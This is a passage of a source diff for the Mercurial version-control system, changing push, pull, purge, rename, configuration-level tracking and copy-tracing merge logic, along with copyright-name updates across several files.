'checkout' is determined without it. - if opts.get(b'rev'): - brev = opts[b'rev'][0] - elif opts.get(b'branch'): - brev = opts[b'branch'][0] - else: - brev = branches[0] - repo._subtoppath = source - try: - ret = postincoming( - ui, repo, modheads, opts.get(b'update'), checkout, brev - ) - except error.FilteredRepoLookupError as exc: - msg = _(b'cannot update to target: %s') % exc.args[0] - exc.args = (msg,) + exc.args[1:] - raise - finally: - del repo._subtoppath - - finally: - other.close() - return ret + except error.FilteredRepoLookupError as exc: + msg = _(b'cannot update to target: %s') % exc.args[0] + exc.args = (msg,) + exc.args[1:] + raise + finally: + del repo._subtoppath + + finally: + other.close() + # skip the remaining pull source if they are some conflict. + if update_conflict: + break + if update_conflict: + return 1 + else: + return 0 + + +@command( + b'purge|clean', + [ + (b'a', b'abort-on-err', None, _(b'abort if an error occurs')), + (b'', b'all', None, _(b'purge ignored files too')), + (b'i', b'ignored', None, _(b'purge only ignored files')), + (b'', b'dirs', None, _(b'purge empty directories')), + (b'', b'files', None, _(b'purge files')), + (b'p', b'print', None, _(b'print filenames instead of deleting them')), + ( + b'0', + b'print0', + None, + _( + b'end filenames with NUL, for use with xargs' + b' (implies -p/--print)' + ), + ), + (b'', b'confirm', None, _(b'ask before permanently deleting files')), + ] + + cmdutil.walkopts, + _(b'hg purge [OPTION]... [DIR]...'), + helpcategory=command.CATEGORY_WORKING_DIRECTORY, +) +def purge(ui, repo, *dirs, **opts): + """removes files not tracked by Mercurial + + Delete files not known to Mercurial. This is useful to test local + and uncommitted changes in an otherwise-clean source tree. + + This means that purge will delete the following by default: + + - Unknown files: files marked with "?" by :hg:`status` + - Empty directories: in fact Mercurial ignores directories unless + they contain files under source control management + + But it will leave untouched: + + - Modified and unmodified tracked files + - Ignored files (unless -i or --all is specified) + - New files added to the repository (with :hg:`add`) + + The --files and --dirs options can be used to direct purge to delete + only files, only directories, or both. If neither option is given, + both will be deleted. + + If directories are given on the command line, only files in these + directories are considered. + + Be careful with purge, as you could irreversibly delete some files + you forgot to add to the repository. If you only want to print the + list of files that this program would delete, use the --print + option. + """ + opts = pycompat.byteskwargs(opts) + cmdutil.check_at_most_one_arg(opts, b'all', b'ignored') + + act = not opts.get(b'print') + eol = b'\n' + if opts.get(b'print0'): + eol = b'\0' + act = False # --print0 implies --print + if opts.get(b'all', False): + ignored = True + unknown = True + else: + ignored = opts.get(b'ignored', False) + unknown = not ignored + + removefiles = opts.get(b'files') + removedirs = opts.get(b'dirs') + confirm = opts.get(b'confirm') + if confirm is None: + try: + extensions.find(b'purge') + confirm = False + except KeyError: + confirm = True + + if not removefiles and not removedirs: + removefiles = True + removedirs = True + + match = scmutil.match(repo[None], dirs, opts) + + paths = mergemod.purge( + repo, + match, + unknown=unknown, + ignored=ignored, + removeemptydirs=removedirs, + removefiles=removefiles, + abortonerror=opts.get(b'abort_on_err'), + noop=not act, + confirm=confirm, + ) + + for path in paths: + if not act: + ui.write(b'%s%s' % (path, eol)) @command( @@ -5482,11 +5626,11 @@ ), ] + remoteopts, - _(b'[-f] [-r REV]... [-e CMD] [--remotecmd CMD] [DEST]'), + _(b'[-f] [-r REV]... [-e CMD] [--remotecmd CMD] [DEST]...'), helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT, helpbasic=True, ) -def push(ui, repo, dest=None, **opts): +def push(ui, repo, *dests, **opts): """push changes to the specified destination Push changesets from the local repository to the specified @@ -5522,6 +5666,9 @@ Please see :hg:`help urls` for important details about ``ssh://`` URLs. If DESTINATION is omitted, a default path will be used. + When passed multiple destinations, push will process them one after the + other, but stop should an error occur. + .. container:: verbose The --pushvars option sends strings to the server that become @@ -5566,75 +5713,89 @@ # this lets simultaneous -r, -b options continue working opts.setdefault(b'rev', []).append(b"null") - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.ConfigError( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) - dest = path.pushloc or path.loc - branches = (path.branch, opts.get(b'branch') or []) - ui.status(_(b'pushing to %s\n') % util.hidepassword(dest)) - revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get(b'rev')) - other = hg.peer(repo, opts, dest) - - if revs: - revs = [repo[r].node() for r in scmutil.revrange(repo, revs)] - if not revs: - raise error.InputError( - _(b"specified revisions evaluate to an empty set"), - hint=_(b"use different revision arguments"), - ) - elif path.pushrev: - # It doesn't make any sense to specify ancestor revisions. So limit - # to DAG heads to make discovery simpler. - expr = revsetlang.formatspec(b'heads(%r)', path.pushrev) - revs = scmutil.revrange(repo, [expr]) - revs = [repo[rev].node() for rev in revs] - if not revs: - raise error.InputError( - _(b'default push revset for path evaluates to an empty set') - ) - elif ui.configbool(b'commands', b'push.require-revs'): - raise error.InputError( - _(b'no revisions specified to push'), - hint=_(b'did you mean "hg push -r ."?'), + some_pushed = False + result = 0 + for path in urlutil.get_push_paths(repo, ui, dests): + dest = path.pushloc or path.loc + branches = (path.branch, opts.get(b'branch') or []) + ui.status(_(b'pushing to %s\n') % urlutil.hidepassword(dest)) + revs, checkout = hg.addbranchrevs( + repo, repo, branches, opts.get(b'rev') ) - - repo._subtoppath = dest - try: - # push subrepos depth-first for coherent ordering - c = repo[b'.'] - subs = c.substate # only repos that are committed - for s in sorted(subs): - result = c.sub(s).push(opts) - if result == 0: - return not result - finally: - del repo._subtoppath - - opargs = dict(opts.get(b'opargs', {})) # copy opargs since we may mutate it - opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', [])) - - pushop = exchange.push( - repo, - other, - opts.get(b'force'), - revs=revs, - newbranch=opts.get(b'new_branch'), - bookmarks=opts.get(b'bookmark', ()), - publish=opts.get(b'publish'), - opargs=opargs, - ) - - result = not pushop.cgresult - - if pushop.bkresult is not None: - if pushop.bkresult == 2: - result = 2 - elif not result and pushop.bkresult: - result = 2 - + other = hg.peer(repo, opts, dest) + + try: + if revs: + revs = [repo[r].node() for r in scmutil.revrange(repo, revs)] + if not revs: + raise error.InputError( + _(b"specified revisions evaluate to an empty set"), + hint=_(b"use different revision arguments"), + ) + elif path.pushrev: + # It doesn't make any sense to specify ancestor revisions. So limit + # to DAG heads to make discovery simpler. + expr = revsetlang.formatspec(b'heads(%r)', path.pushrev) + revs = scmutil.revrange(repo, [expr]) + revs = [repo[rev].node() for rev in revs] + if not revs: + raise error.InputError( + _( + b'default push revset for path evaluates to an empty set' + ) + ) + elif ui.configbool(b'commands', b'push.require-revs'): + raise error.InputError( + _(b'no revisions specified to push'), + hint=_(b'did you mean "hg push -r ."?'), + ) + + repo._subtoppath = dest + try: + # push subrepos depth-first for coherent ordering + c = repo[b'.'] + subs = c.substate # only repos that are committed + for s in sorted(subs): + sub_result = c.sub(s).push(opts) + if sub_result == 0: + return 1 + finally: + del repo._subtoppath + + opargs = dict( + opts.get(b'opargs', {}) + ) # copy opargs since we may mutate it + opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', [])) + + pushop = exchange.push( + repo, + other, + opts.get(b'force'), + revs=revs, + newbranch=opts.get(b'new_branch'), + bookmarks=opts.get(b'bookmark', ()), + publish=opts.get(b'publish'), + opargs=opargs, + ) + + if pushop.cgresult == 0: + result = 1 + elif pushop.cgresult is not None: + some_pushed = True + + if pushop.bkresult is not None: + if pushop.bkresult == 2: + result = 2 + elif not result and pushop.bkresult: + result = 2 + + if result: + break + + finally: + other.close() + if result == 0 and not some_pushed: + result = 1 return result @@ -5740,6 +5901,7 @@ @command( b'rename|move|mv', [ + (b'', b'forget', None, _(b'unmark a destination file as renamed')), (b'A', b'after', None, _(b'record a rename that has already occurred')), ( b'', @@ -5771,8 +5933,13 @@ exist in the working directory. If invoked with -A/--after, the operation is recorded, but no copying is performed. - This command takes effect at the next commit. To undo a rename - before that, see :hg:`revert`. + To undo marking a destination file as renamed, use --forget. With that + option, all given (positional) arguments are unmarked as renames. The + destination file(s) will be left in place (still tracked). The source + file(s) will not be restored. Note that :hg:`rename --forget` behaves + the same way as :hg:`copy --forget`. + + This command takes effect with the next commit by default. Returns 0 on success, 1 if errors are encountered. """ @@ -6083,7 +6250,7 @@ if hint: ui.warn(hint) - unresolvedf = list(ms.unresolved()) + unresolvedf = ms.unresolvedcount() if not unresolvedf: ui.status(_(b'(no more unresolved files)\n')) cmdutil.checkafterresolved(repo) @@ -7043,7 +7210,12 @@ return def getincoming(): - source, branches = hg.parseurl(ui.expandpath(b'default')) + # XXX We should actually skip this if no default is specified, instead + # of passing "default" which will resolve as "./default/" if no default + # path is defined. + source, branches = urlutil.get_unique_pull_path( + b'summary', repo, ui, b'default' + ) sbranch = branches[0] try: other = hg.peer(repo, {}, source) @@ -7054,7 +7226,7 @@ revs, checkout = hg.addbranchrevs(repo, other, branches, None) if revs: revs = [other.lookup(rev) for rev in revs] - ui.debug(b'comparing with %s\n' % util.hidepassword(source)) + ui.debug(b'comparing with %s\n' % urlutil.hidepassword(source)) repo.ui.pushbuffer() commoninc = discovery.findcommonincoming(repo, other, heads=revs) repo.ui.popbuffer() @@ -7066,9 +7238,22 @@ source = sbranch = sother = commoninc = incoming = None def getoutgoing(): - dest, branches = hg.parseurl(ui.expandpath(b'default-push', b'default')) - dbranch = branches[0] - revs, checkout = hg.addbranchrevs(repo, repo, branches, None) + # XXX We should actually skip this if no default is specified, instead + # of passing "default" which will resolve as "./default/" if no default + # path is defined. + d = None + if b'default-push' in ui.paths: + d = b'default-push' + elif b'default' in ui.paths: + d = b'default' + if d is not None: + path = urlutil.get_unique_push_path(b'summary', repo, ui, d) + dest = path.pushloc or path.loc + dbranch = path.branch + else: + dest = b'default' + dbranch = None + revs, checkout = hg.addbranchrevs(repo, repo, (dbranch, []), None) if source != dest: try: dother = hg.peer(repo, {}, dest) @@ -7076,7 +7261,7 @@ if opts.get(b'remote'): raise return dest, dbranch, None, None - ui.debug(b'comparing with %s\n' % util.hidepassword(dest)) + ui.debug(b'comparing with %s\n' % urlutil.hidepassword(dest)) elif sother is None: # there is no explicit destination peer, but source one is invalid return dest, dbranch, None, None @@ -7101,6 +7286,12 @@ dest = dbranch = dother = outgoing = None if opts.get(b'remote'): + # Help pytype. --remote sets both `needsincoming` and `needsoutgoing`. + # The former always sets `sother` (or raises an exception if it can't); + # the latter always sets `outgoing`. + assert sother is not None + assert outgoing is not None + t = [] if incoming: t.append(_(b'1 or more incoming')) @@ -7412,7 +7603,7 @@ try: txnname = b'unbundle' if not isinstance(gen, bundle2.unbundle20): - txnname = b'unbundle\n%s' % util.hidepassword(url) + txnname = b'unbundle\n%s' % urlutil.hidepassword(url) with repo.transaction(txnname) as tr: op = bundle2.applybundle( repo, gen, tr, source=b'unbundle', url=url @@ -7428,7 +7619,10 @@ ) modheads = bundle2.combinechangegroupresults(op) - return postincoming(ui, repo, modheads, opts.get('update'), None, None) + if postincoming(ui, repo, modheads, opts.get('update'), None, None): + return 1 + else: + return 0 @command( @@ -7708,7 +7902,7 @@ ) license = _( b"(see https://mercurial-scm.org for more information)\n" - b"\nCopyright (C) 2005-2021 Matt Mackall and others\n" + b"\nCopyright (C) 2005-2021 Olivia Mackall and others\n" b"This is free software; see the source for copying conditions. " b"There is NO\nwarranty; " b"not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" diff --git a/mercurial/commandserver.py b/mercurial/commandserver.py --- a/mercurial/commandserver.py +++ b/mercurial/commandserver.py @@ -1,6 +1,6 @@ # commandserver.py - communicate with Mercurial's API over a pipe # -# Copyright Matt Mackall <mpm@selenic.com> +# Copyright Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/commit.py b/mercurial/commit.py --- a/mercurial/commit.py +++ b/mercurial/commit.py @@ -96,6 +96,10 @@ ctx.date(), extra, ) + rev = repo[n].rev() + if oldtip != repo.changelog.tiprev(): + repo.register_changeset(rev, repo.changelog.changelogrevision(rev)) + xp1, xp2 = p1.hex(), p2 and p2.hex() or b'' repo.hook( b'pretxncommit', @@ -108,7 +112,7 @@ targetphase = subrepoutil.newcommitphase(repo.ui, ctx) # prevent unmarking changesets as public on recommit - waspublic = oldtip == repo.changelog.tiprev() and not repo[n].phase() + waspublic = oldtip == repo.changelog.tiprev() and not repo[rev].phase() if targetphase and not waspublic: # retract boundary do not alter parent changeset. @@ -116,7 +120,7 @@ # be compliant anyway # # if minimal phase was 0 we don't need to retract anything - phases.registernew(repo, tr, targetphase, [repo[n].rev()]) + phases.registernew(repo, tr, targetphase, [rev]) return n @@ -357,6 +361,8 @@ elif fparent2 != nullid: if ms.active() and ms.extras(fname).get(b'filenode-source') == b'other': fparent1, fparent2 = fparent2, nullid + elif ms.active() and ms.extras(fname).get(b'merged') != b'yes': + fparent1, fparent2 = fparent1, nullid # is one parent an ancestor of the other? else: fparentancestors = flog.commonancestorsheads(fparent1, fparent2) diff --git a/mercurial/config.py b/mercurial/config.py --- a/mercurial/config.py +++ b/mercurial/config.py @@ -1,6 +1,6 @@ # config.py - configuration parsing for Mercurial # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -22,14 +22,19 @@ class config(object): def __init__(self, data=None): + self._current_source_level = 0 self._data = {} self._unset = [] if data: for k in data._data: self._data[k] = data[k].copy() - self._source = data._source.copy() - else: - self._source = util.cowdict() + self._current_source_level = data._current_source_level + 1 + + def new_source(self): + """increment the source counter + + This is used to define source priority when reading""" + self._current_source_level += 1 def copy(self): return config(self) @@ -48,45 +53,66 @@ yield d def update(self, src): - self._source = self._source.preparewrite() + current_level = self._current_source_level + current_level += 1 + max_level = self._current_source_level for s, n in src._unset: ds = self._data.get(s, None) if ds is not None and n in ds: self._data[s] = ds.preparewrite() del self._data[s][n] - del self._source[(s, n)] for s in src: ds = self._data.get(s, None) if ds: self._data[s] = ds.preparewrite() else: self._data[s] = util.cowsortdict() - self._data[s].update(src._data[s]) - self._source.update(src._source) + for k, v in src._data[s].items(): + value, source, level = v + level += current_level + max_level = max(level, current_level) + self._data[s][k] = (value, source, level) + self._current_source_level = max_level + + def _get(self, section, item): + return self._data.get(section, {}).get(item) def get(self, section, item, default=None): - return self._data.get(section, {}).get(item, default) + result = self._get(section, item) + if result is None: + return default + return result[0] - def backup(self, section, item): + def backup(self, section, key): """return a tuple allowing restore to reinstall a previous value The main reason we need it is because it handles the "no data" case. """ try: - value = self._data[section][item] - source = self.source(section, item) - return (section, item, value, source) + item = self._data[section][key] except KeyError: - return (section, item) + return (section, key) + else: + return (section, key) + item def source(self, section, item): - return self._source.get((section, item), b"") + result = self._get(section, item) + if result is None: + return b"" + return result[1] + + def level(self, section, item): + result = self._get(section, item) + if result is None: + return None + return result[2] def sections(self): return sorted(self._data.keys()) def items(self, section): - return list(pycompat.iteritems(self._data.get(section, {}))) + items = pycompat.iteritems(self._data.get(section, {})) + return [(k, v[0]) for (k, v) in items] def set(self, section, item, value, source=b""): if pycompat.ispy3: @@ -103,26 +129,31 @@ self._data[section] = util.cowsortdict() else: self._data[section] = self._data[section].preparewrite() - self._data[section][item] = value - if source: - self._source = self._source.preparewrite() - self._source[(section, item)] = source + self._data[section][item] = (value, source, self._current_source_level) + + def alter(self, section, key, new_value): + """alter a value without altering its source or level + + This method is meant to be used by `ui.fixconfig` only.""" + item = self._data[section][key] + size = len(item) + new_item = (new_value,) + item[1:] + assert len(new_item) == size + self._data[section][key] = new_item def restore(self, data): """restore data returned by self.backup""" - self._source = self._source.preparewrite() - if len(data) == 4: + if len(data) != 2: # restore old data - section, item, value, source = data + section, key = data[:2] + item = data[2:] self._data[section] = self._data[section].preparewrite() - self._data[section][item] = value - self._source[(section, item)] = source + self._data[section][key] = item else: # no data before, remove everything section, item = data if section in self._data: self._data[section].pop(item, None) - self._source.pop((section, item), None) def parse(self, src, data, sections=None, remap=None, include=None): sectionre = util.re.compile(br'\[([^\[]+)\]') @@ -206,6 +237,7 @@ raise error.ConfigError(message, (b"%s:%d" % (src, line))) def read(self, path, fp=None, sections=None, remap=None): + self.new_source() if not fp: fp = util.posixfile(path, b'rb') assert ( @@ -220,6 +252,8 @@ def include(rel, remap, sections): abs = os.path.normpath(os.path.join(dir, rel)) self.read(abs, remap=remap, sections=sections) + # anything after the include has a higher level + self.new_source() self.parse( path, fp.read(), sections=sections, remap=remap, include=include diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -570,11 +570,21 @@ default=0, ) coreconfigitem( + b'convert', + b'svn.dangerous-set-commit-dates', + default=False, +) +coreconfigitem( b'debug', b'dirstate.delaywrite', default=0, ) coreconfigitem( + b'debug', + b'revlog.verifyposition.changelog', + default=b'', +) +coreconfigitem( b'defaults', b'.*', default=None, @@ -610,6 +620,12 @@ b'check-relroot', default=False, ) +# Track copy information for all file, not just "added" one (very slow) +coreconfigitem( + b'devel', + b'copy-tracing.trace-all-files', + default=False, +) coreconfigitem( b'devel', b'default-date', @@ -689,6 +705,11 @@ ) coreconfigitem( b'devel', + b'copy-tracing.multi-thread', + default=True, +) +coreconfigitem( + b'devel', b'debug.extensions', default=False, ) @@ -716,6 +737,14 @@ b'discovery.grow-sample', default=True, ) +# When discovery.grow-sample.dynamic is True, the default, the sample size is +# adapted to the shape of the undecided set (it is set to the max of: +# <target-size>, len(roots(undecided)), len(heads(undecided) +coreconfigitem( + b'devel', + b'discovery.grow-sample.dynamic', + default=True, +) # discovery.grow-sample.rate control the rate at which the sample grow coreconfigitem( b'devel', @@ -729,8 +758,26 @@ b'discovery.randomize', default=True, ) +# Control the initial size of the discovery sample +coreconfigitem( + b'devel', + b'discovery.sample-size', + default=200, +) +# Control the initial size of the discovery for initial change +coreconfigitem( + b'devel', + b'discovery.sample-size.initial', + default=100, +) _registerdiffopts(section=b'diff') coreconfigitem( + b'diff', + b'merge', + default=False, + experimental=True, +) +coreconfigitem( b'email', b'bcc', default=None, @@ -827,6 +874,31 @@ ) coreconfigitem( b'experimental', + b'bundlecompthreads', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.bzip2', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.gzip', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.none', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.zstd', + default=None, +) +coreconfigitem( + b'experimental', b'changegroup3', default=False, ) @@ -1235,7 +1307,7 @@ coreconfigitem( b'format', b'revlog-compression', - default=lambda: [b'zlib'], + default=lambda: [b'zstd', b'zlib'], alias=[(b'experimental', b'format.compression')], ) coreconfigitem( @@ -1253,10 +1325,36 @@ b'usestore', default=True, ) + + +def _persistent_nodemap_default(): + """compute `use-persistent-nodemap` default value + + The feature is disabled unless a fast implementation is available. + """ + from . import policy + + return policy.importrust('revlog') is not None + + coreconfigitem( b'format', b'use-persistent-nodemap', + default=_persistent_nodemap_default, +) +# TODO needs to grow a docket file to at least store the last offset of the data +# file when rewriting sidedata. +# Will also need a way of dealing with garbage data if we allow rewriting +# *existing* sidedata. +# Exchange-wise, we will also need to do something more efficient than keeping +# references to the affected revlogs, especially memory-wise when rewriting +# sidedata. +# Also... compress the sidedata? (this should be coming very soon) +coreconfigitem( + b'format', + b'exp-revlogv2.2', default=False, + experimental=True, ) coreconfigitem( b'format', diff --git a/mercurial/context.py b/mercurial/context.py --- a/mercurial/context.py +++ b/mercurial/context.py @@ -1,6 +1,6 @@ # context.py - changeset and file context objects for mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -2599,6 +2599,7 @@ b'flags': flags, b'copied': copied, } + util.clearcachedproperty(self, b'_manifest') def filectx(self, path, filelog=None): return overlayworkingfilectx( @@ -2884,7 +2885,7 @@ # "1 < len(self._parents)" can't be used for checking # existence of the 2nd parent, because "memctx._parents" is # explicitly initialized by the list, of which length is 2. - if p2.node() != nullid: + if p2.rev() != nullrev: man2 = p2.manifest() managing = lambda f: f in man1 or f in man2 else: @@ -2902,7 +2903,7 @@ return scmutil.status(modified, added, removed, [], [], [], []) def parents(self): - if self._parents[1].node() == nullid: + if self._parents[1].rev() == nullrev: return [self._parents[0]] return self._parents @@ -2999,7 +3000,7 @@ parents = [repo[p] for p in parents if p is not None] parents = parents[:] while len(parents) < 2: - parents.append(repo[nullid]) + parents.append(repo[nullrev]) p1, p2 = self._parents = parents # sanity check to ensure that the reused manifest parents are @@ -3051,7 +3052,7 @@ # "1 < len(self._parents)" can't be used for checking # existence of the 2nd parent, because "metadataonlyctx._parents" is # explicitly initialized by the list, of which length is 2. - if p2.node() != nullid: + if p2.rev() != nullrev: man2 = p2.manifest() managing = lambda f: f in man1 or f in man2 else: diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -1,7 +1,7 @@ # coding: utf8 # copies.py - copy detection for Mercurial # -# Copyright 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -59,14 +59,13 @@ # Cases 1, 3, and 5 are then removed by _filter(). for k, v in list(t.items()): - # remove copies from files that didn't exist - if v not in src: + if k == v: # case 3 del t[k] - # remove criss-crossed copies - elif k in src and v in dst: + elif v not in src: # case 5 + # remove copies from files that didn't exist del t[k] - # remove copies to files that were then removed - elif k not in dst: + elif k not in dst: # case 1 + # remove copies to files that were then removed del t[k] @@ -150,16 +149,24 @@ # optimization, since the ctx.files() for a merge commit is not correct for # this comparison. forwardmissingmatch = match - if b.p1() == a and b.p2().node() == nullid: + if b.p1() == a and b.p2().rev() == nullrev: filesmatcher = matchmod.exact(b.files()) forwardmissingmatch = matchmod.intersectmatchers(match, filesmatcher) - missing = _computeforwardmissing(a, b, match=forwardmissingmatch) + if repo.ui.configbool(b'devel', b'copy-tracing.trace-all-files'): + missing = list(b.walk(match)) + # _computeforwardmissing(a, b, match=forwardmissingmatch) + if debug: + dbg(b'debug.copies: searching all files: %d\n' % len(missing)) + else: + missing = _computeforwardmissing(a, b, match=forwardmissingmatch) + if debug: + dbg( + b'debug.copies: missing files to search: %d\n' + % len(missing) + ) ancestrycontext = a._repo.changelog.ancestors([b.rev()], inclusive=True) - if debug: - dbg(b'debug.copies: missing files to search: %d\n' % len(missing)) - for f in sorted(missing): if debug: dbg(b'debug.copies: tracing file: %s\n' % f) @@ -267,6 +274,7 @@ revs = cl.findmissingrevs(common=[a.rev()], heads=[b.rev()]) roots = set() has_graph_roots = False + multi_thread = repo.ui.configbool(b'devel', b'copy-tracing.multi-thread') # iterate over `only(B, A)` for r in revs: @@ -314,7 +322,13 @@ children_count[p] += 1 revinfo = _revinfo_getter(repo, match) return _combine_changeset_copies( - revs, children_count, b.rev(), revinfo, match, isancestor + revs, + children_count, + b.rev(), + revinfo, + match, + isancestor, + multi_thread, ) else: # When not using side-data, we will process the edges "from" the parent. @@ -339,7 +353,7 @@ def _combine_changeset_copies( - revs, children_count, targetrev, revinfo, match, isancestor + revs, children_count, targetrev, revinfo, match, isancestor, multi_thread ): """combine the copies information for each item of iterrevs @@ -356,7 +370,7 @@ if rustmod is not None: final_copies = rustmod.combine_changeset_copies( - list(revs), children_count, targetrev, revinfo, isancestor + list(revs), children_count, targetrev, revinfo, multi_thread ) else: isancestor = cached_is_ancestor(isancestor) @@ -427,7 +441,11 @@ # potential filelog related behavior. assert parent == 2 current_copies = _merge_copies_dict( - newcopies, current_copies, isancestor, changes + newcopies, + current_copies, + isancestor, + changes, + current_rev, ) all_copies[current_rev] = current_copies @@ -449,7 +467,7 @@ PICK_EITHER = 2 -def _merge_copies_dict(minor, major, isancestor, changes): +def _merge_copies_dict(minor, major, isancestor, changes, current_merge): """merge two copies-mapping together, minor and major In case of conflict, value from "major" will be picked. @@ -467,39 +485,75 @@ if other is None: minor[dest] = value else: - pick = _compare_values(changes, isancestor, dest, other, value) - if pick == PICK_MAJOR: + pick, overwrite = _compare_values( + changes, isancestor, dest, other, value + ) + if overwrite: + if pick == PICK_MAJOR: + minor[dest] = (current_merge, value[1]) + else: + minor[dest] = (current_merge, other[1]) + elif pick == PICK_MAJOR: minor[dest] = value return minor def _compare_values(changes, isancestor, dest, minor, major): - """compare two value within a _merge_copies_dict loop iteration""" + """compare two value within a _merge_copies_dict loop iteration + + return (pick, overwrite). + + - pick is one of PICK_MINOR, PICK_MAJOR or PICK_EITHER + - overwrite is True if pick is a return of an ambiguity that needs resolution. + """ major_tt, major_value = major minor_tt, minor_value = minor - # evacuate some simple case first: if major_tt == minor_tt: # if it comes from the same revision it must be the same value assert major_value == minor_value - return PICK_EITHER - elif major[1] == minor[1]: - return PICK_EITHER - - # actual merging needed: content from "major" wins, unless it is older than - # the branch point or there is a merge - elif changes is not None and major[1] is None and dest in changes.salvaged: - return PICK_MINOR - elif changes is not None and minor[1] is None and dest in changes.salvaged: - return PICK_MAJOR - elif changes is not None and dest in changes.merged: - return PICK_MAJOR - elif not isancestor(major_tt, minor_tt): - if major[1] is not None: - return PICK_MAJOR - elif isancestor(minor_tt, major_tt): - return PICK_MAJOR - return PICK_MINOR + return PICK_EITHER, False + elif ( + changes is not None + and minor_value is not None + and major_value is None + and dest in changes.salvaged + ): + # In this case, a deletion was reverted, the "alive" value overwrite + # the deleted one. + return PICK_MINOR, True + elif ( + changes is not None + and major_value is not None + and minor_value is None + and dest in changes.salvaged + ): + # In this case, a deletion was reverted, the "alive" value overwrite + # the deleted one. + return PICK_MAJOR, True + elif isancestor(minor_tt, major_tt): + if changes is not None and dest in changes.merged: + # change to dest happened on the branch without copy-source change, + # so both source are valid and "major" wins. + return PICK_MAJOR, True + else: + return PICK_MAJOR, False + elif isancestor(major_tt, minor_tt): + if changes is not None and dest in changes.merged: + # change to dest happened on the branch without copy-source change, + # so both source are valid and "major" wins. + return PICK_MAJOR, True + else: + return PICK_MINOR, False + elif minor_value is None: + # in case of conflict, the "alive" side wins. + return PICK_MAJOR, True + elif major_value is None: + # in case of conflict, the "alive" side wins. + return PICK_MINOR, True + else: + # in case of conflict where both side are alive, major wins. + return PICK_MAJOR, True def _revinfo_getter_extra(repo): @@ -650,22 +704,28 @@ def _backwardrenames(a, b, match): + """find renames from a to b""" if a._repo.ui.config(b'experimental', b'copytrace') == b'off': return {} + # We don't want to pass in "match" here, since that would filter + # the destination by it. Since we're reversing the copies, we want + # to filter the source instead. + copies = _forwardcopies(b, a) + return _reverse_renames(copies, a, match) + + +def _reverse_renames(copies, dst, match): + """given copies to context 'dst', finds renames from that context""" # Even though we're not taking copies into account, 1:n rename situations # can still exist (e.g. hg cp a b; hg mv a c). In those cases we # arbitrarily pick one of the renames. - # We don't want to pass in "match" here, since that would filter - # the destination by it. Since we're reversing the copies, we want - # to filter the source instead. - f = _forwardcopies(b, a) r = {} - for k, v in sorted(pycompat.iteritems(f)): + for k, v in sorted(pycompat.iteritems(copies)): if match and not match(v): continue # remove copies - if v in a: + if v in dst: continue r[v] = k return r @@ -701,9 +761,17 @@ base = None if a.rev() != nullrev: base = x + x_copies = _forwardcopies(a, x) + y_copies = _forwardcopies(a, y, base, match=match) + same_keys = set(x_copies) & set(y_copies) + for k in same_keys: + if x_copies.get(k) == y_copies.get(k): + del x_copies[k] + del y_copies[k] + x_backward_renames = _reverse_renames(x_copies, x, match) copies = _chain( - _backwardrenames(x, a, match=match), - _forwardcopies(a, y, base, match=match), + x_backward_renames, + y_copies, ) _filter(x, y, copies) return copies @@ -1042,11 +1110,17 @@ b" discovered dir src: '%s' -> dst: '%s'\n" % (d, dirmove[d]) ) + # Sort the directories in reverse order, so we find children first + # For example, if dir1/ was renamed to dir2/, and dir1/subdir1/ + # was renamed to dir2/subdir2/, we want to move dir1/subdir1/file + # to dir2/subdir2/file (not dir2/subdir1/file) + dirmove_children_first = sorted(dirmove, reverse=True) + movewithdir = {} # check unaccounted nonoverlapping files against directory moves for f in addedfilesfn(): if f not in fullcopy: - for d in dirmove: + for d in dirmove_children_first: if f.startswith(d): # new file added in a directory that was moved, move it df = dirmove[d] + f[len(d) :] @@ -1220,6 +1294,15 @@ by merge.update(). """ new_copies = pathcopies(base, ctx) - _filter(wctx.p1(), wctx, new_copies) + parent = wctx.p1() + _filter(parent, wctx, new_copies) + # Extra filtering to drop copy information for files that existed before + # the graft. This is to handle the case of grafting a rename onto a commit + # that already has the rename. Otherwise the presence of copy information + # would result in the creation of an empty commit where we would prefer to + # not create one. + for dest, __ in list(new_copies.items()): + if dest in parent: + del new_copies[dest] for dst, src in pycompat.iteritems(new_copies): wctx[dst].markcopied(src) diff --git a/mercurial/dagop.py b/mercurial/dagop.py --- a/mercurial/dagop.py +++ b/mercurial/dagop.py @@ -1,6 +1,6 @@ # dagop.py - graph ancestry and topology algorithm for revset # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -1,6 +1,6 @@ # debugcommands.py - command processing for debug* commands # -# Copyright 2005-2016 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2016 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -9,6 +9,7 @@ import codecs import collections +import contextlib import difflib import errno import glob @@ -69,6 +70,7 @@ pycompat, registrar, repair, + repoview, revlog, revset, 